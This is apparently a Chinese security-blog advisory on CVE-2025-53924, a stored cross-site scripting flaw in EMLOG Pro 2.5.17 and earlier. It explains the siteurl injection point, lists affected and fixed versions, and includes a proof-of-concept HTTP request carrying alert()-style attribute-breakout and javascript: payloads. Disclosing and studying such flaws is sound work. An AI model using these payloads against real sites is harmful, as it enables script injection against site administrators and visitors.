首页 网络安全 正文
  • 本文约1219字,阅读需6分钟
  • 14
  • 0

EMLOG Pro 2.5.17跨站点脚本漏洞CVE-2025-53924

摘要

栋科技漏洞库关注到EMLOG Pro 2.5.17及之前版本中存在跨站点脚本(XSS)漏洞,漏洞已被追踪为CVE-2025-53924,CVSS评分6.9。

EMLOG Pro是一款轻量级开源博客和CMS建站系统,专注内容创作与用户体验,通过应用商店提供丰富插件生态,支持主题扩展等功能。

一、基本情况

EMLOG Pro 2.5.17 版本的发布时间为2025年06月29日,增加了文章审核挂载点和获取草稿详情和草稿列表等接口,获取IP函数支持IPv6。

TEMLOG PRO 2.5.17跨站点脚本漏洞CVE-2025-53924

栋科技漏洞库关注到EMLOG Pro 2.5.17及之前版本中存在跨站点脚本(XSS)漏洞,漏洞已被追踪为CVE-2025-53924,CVSS评分6.9。

二、漏洞分析

CVE-2025-53924漏洞是EMLOG Pro 2.5.17以及之前版本中,存在一个容易受到链接功能中存储的跨站点脚本(XSS)影响的安全漏洞。

该漏洞使得经过身份验证的远程攻击者可通过siteurl参数插入任意web脚本或HTML,可能将恶意代码注入siteurl参数,从而导致存储XSS。

该漏洞被利用需要一定的前提条件,即需网站管理员点击攻击者精心制作的链接,恶意代码才能够被执行,才可能导致该安全漏洞被触发。

三、POC概念验证

1、为了利用该漏洞, 以管理员用户身份发送以下请求:

POST /emlog/admin/link.php?action=save HTTP/1.1
Host: [REDACTED]
Content-Length: 136
Cache-Control: max-age=0
Origin: http://[REDACTED]
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: [REDACTED]
Sec-GPC: 1
Accept-Language: pl-PL,pl;q=0.6
Referer: http://[REDACTED]/emlog/admin/link.php?active_save=1
Accept-Encoding: gzip, deflate, br
Cookie: commentposter=abc%5C%27%5C%22%3E%3Ch1%3Eabc%3C%2Fh1%3E%24%7B%7B33-11%7D%7D%3C%5C%27%5C%22; postermail=abc%40cba.pl; PHPSESSID=[REDACTED]; EM_AUTHCOOKIE_[REDACTED]=[REDACTED]
Connection: keep-alive

sitename=xss+alert+1&siteurl=https%3A%2F%2Fabc%22%2Fonclick%3D%22alert%281%29&icon=javascript%3Aalert%281%29%3B&description=abc&linkid=2

2、 单击创建URL,注入的JavaScript代码将被执行

四、影响范围

EMLOG Pro <= 2.5.17

五、修复建议

EMLOG Pro >= 2.5.18

六、参考链接

管理员已设置登录后刷新可查看



扫描二维码,在手机上阅读
评论
更换验证码
友情链接